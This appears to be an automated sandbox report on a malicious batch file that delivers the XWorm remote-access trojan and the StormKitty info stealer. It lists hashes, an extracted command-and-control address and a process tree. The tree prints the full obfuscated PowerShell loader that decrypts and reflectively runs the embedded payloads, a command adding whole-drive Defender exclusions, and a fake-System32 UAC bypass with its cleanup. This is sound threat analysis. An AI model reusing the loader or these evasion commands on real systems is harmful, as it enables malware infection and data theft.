Analysis
-
max time kernel
132s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
30/05/2024, 07:51
Static task
static1
Behavioral task
behavioral1
Sample
myxwr5cli.bat
Resource
win7-20240221-en
General
-
Target
myxwr5cli.bat
-
Size
379KB
-
MD5
03c6c2175f84ad54c989f0608d3cbb57
-
SHA1
9846d7aa4c639d038f428977dfe0eef7db8ac009
-
SHA256
6d04562cf9d1e0ee7b7c77af40e1e3299b6eba9375f35978d9776d94a9dae3d7
-
SHA512
45bc9713a632904216f5bfd3e5648542382bc5c3aa8fa5253eea9f04d6592ac0aabcffc02451261210835f4f4d57c1f4895b7d02be24dd5edffbdc5e5b5e13c8
-
SSDEEP
6144:xdlplCiywRsuBfq3Y3zzyMECoefagF68zh3IHstkjcGH9z2eRTbYXa8KZITbq:xrCiHWuBS3Y3zzyDCoefPQsy/qeF6KZl
Malware Config
Extracted
xworm
5.0
127.0.0.1:7001
134.255.233.93:7001
5loUYH5mEGReJgAG
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/4748-70-0x0000018AD6DB0000-0x0000018AD6DC0000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/4748-88-0x0000018AD70C0000-0x0000018AD71DE000-memory.dmp family_stormkitty -
Blocklisted process makes network request 1 IoCs
flow pid Process 33 4748 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 4856 powershell.exe 4748 powershell.exe 640 powershell.exe 4992 powershell.exe 396 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4540 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
pid Process 4540 ComputerDefaults.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 4856 powershell.exe 4856 powershell.exe 4992 powershell.exe 4992 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 640 powershell.exe 640 powershell.exe 640 powershell.exe 4748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4856 powershell.exe Token: SeDebugPrivilege 4992 powershell.exe Token: SeDebugPrivilege 4748 powershell.exe Token: SeDebugPrivilege 396 powershell.exe Token: SeDebugPrivilege 640 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4748 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 3972 wrote to memory of 3700 3972 cmd.exe 84 PID 3972 wrote to memory of 3700 3972 cmd.exe 84 PID 3972 wrote to memory of 4628 3972 cmd.exe 86 PID 3972 wrote to memory of 4628 3972 cmd.exe 86 PID 3972 wrote to memory of 4856 3972 cmd.exe 87 PID 3972 wrote to memory of 4856 3972 cmd.exe 87 PID 4856 wrote to memory of 4992 4856 powershell.exe 89 PID 4856 wrote to memory of 4992 4856 powershell.exe 89 PID 4856 wrote to memory of 3516 4856 powershell.exe 91 PID 4856 wrote to memory of 3516 4856 powershell.exe 91 PID 3516 wrote to memory of 4540 3516 cmd.exe 95 PID 3516 wrote to memory of 4540 3516 cmd.exe 95 PID 4540 wrote to memory of 5080 4540 ComputerDefaults.exe 96 PID 4540 wrote to memory of 5080 4540 ComputerDefaults.exe 96 PID 5080 wrote to memory of 2136 5080 cmd.exe 98 PID 5080 wrote to memory of 2136 5080 cmd.exe 98 PID 5080 wrote to memory of 3732 5080 cmd.exe 101 PID 5080 wrote to memory of 3732 5080 cmd.exe 101 PID 5080 wrote to memory of 4748 5080 cmd.exe 102 PID 5080 wrote to memory of 4748 5080 cmd.exe 102 PID 4748 wrote to memory of 396 4748 powershell.exe 103 PID 4748 wrote to memory of 396 4748 powershell.exe 103 PID 4748 wrote to memory of 640 4748 powershell.exe 105 PID 4748 wrote to memory of 640 4748 powershell.exe 105 PID 4856 wrote to memory of 536 4856 powershell.exe 112 PID 4856 wrote to memory of 536 4856 powershell.exe 112
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\myxwr5cli.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵PID:3700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP+qKNutTynKUkrEYUHXrfgFt+qGd2k9eoIQyTxHELs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w4Vmy/houRSXsK7A9z6kzA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lvUHo=New-Object System.IO.MemoryStream(,$param_var); $UxGoq=New-Object System.IO.MemoryStream; $NiPKr=New-Object System.IO.Compression.GZipStream($lvUHo, [IO.Compression.CompressionMode]::Decompress); $NiPKr.CopyTo($UxGoq); $NiPKr.Dispose(); $lvUHo.Dispose(); $UxGoq.Dispose(); $UxGoq.ToArray();}function execute_function($param_var,$param2_var){ $KkPkD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zNDLa=$KkPkD.EntryPoint; $zNDLa.Invoke($null, $param2_var);}$XLuZt = 'C:\Users\Admin\AppData\Local\Temp\myxwr5cli.bat';$host.UI.RawUI.WindowTitle = $XLuZt;$fEYHc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XLuZt).Split([Environment]::NewLine);foreach ($OYqiR in $fEYHc) { if ($OYqiR.StartsWith('yCOdwoiwmunBFrPLojaG')) { $RNNcG=$OYqiR.Substring(20); break; }}$payloads_var=[string[]]$RNNcG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:4628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c call SC.cmd5⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"6⤵PID:2136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP+qKNutTynKUkrEYUHXrfgFt+qGd2k9eoIQyTxHELs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w4Vmy/houRSXsK7A9z6kzA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lvUHo=New-Object System.IO.MemoryStream(,$param_var); $UxGoq=New-Object System.IO.MemoryStream; $NiPKr=New-Object System.IO.Compression.GZipStream($lvUHo, [IO.Compression.CompressionMode]::Decompress); $NiPKr.CopyTo($UxGoq); $NiPKr.Dispose(); $lvUHo.Dispose(); $UxGoq.Dispose(); $UxGoq.ToArray();}function execute_function($param_var,$param2_var){ $KkPkD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zNDLa=$KkPkD.EntryPoint; $zNDLa.Invoke($null, $param2_var);}$XLuZt = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $XLuZt;$fEYHc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XLuZt).Split([Environment]::NewLine);foreach ($OYqiR in $fEYHc) { if ($OYqiR.StartsWith('yCOdwoiwmunBFrPLojaG')) { $RNNcG=$OYqiR.Substring(20); break; }}$payloads_var=[string[]]$RNNcG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:3732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q3⤵PID:536
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
944B
MD534f595487e6bfd1d11c7de88ee50356a
SHA14caad088c15766cc0fa1f42009260e9a02f953bb
SHA2560f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA51210976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b
-
Filesize
379KB
MD503c6c2175f84ad54c989f0608d3cbb57
SHA19846d7aa4c639d038f428977dfe0eef7db8ac009
SHA2566d04562cf9d1e0ee7b7c77af40e1e3299b6eba9375f35978d9776d94a9dae3d7
SHA51245bc9713a632904216f5bfd3e5648542382bc5c3aa8fa5253eea9f04d6592ac0aabcffc02451261210835f4f4d57c1f4895b7d02be24dd5edffbdc5e5b5e13c8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
80KB
MD5d25a9e160e3b74ef2242023726f15416
SHA127a9bb9d7628d442f9b5cf47711c906e3315755b
SHA2567b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
SHA512bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910
-
Filesize
122KB
MD5e286ada1af4b08fa4b7c78f862883c4e
SHA1798ebc7b7cd3db667f1a59ade299be4cff397f39
SHA25616eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3
SHA512fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5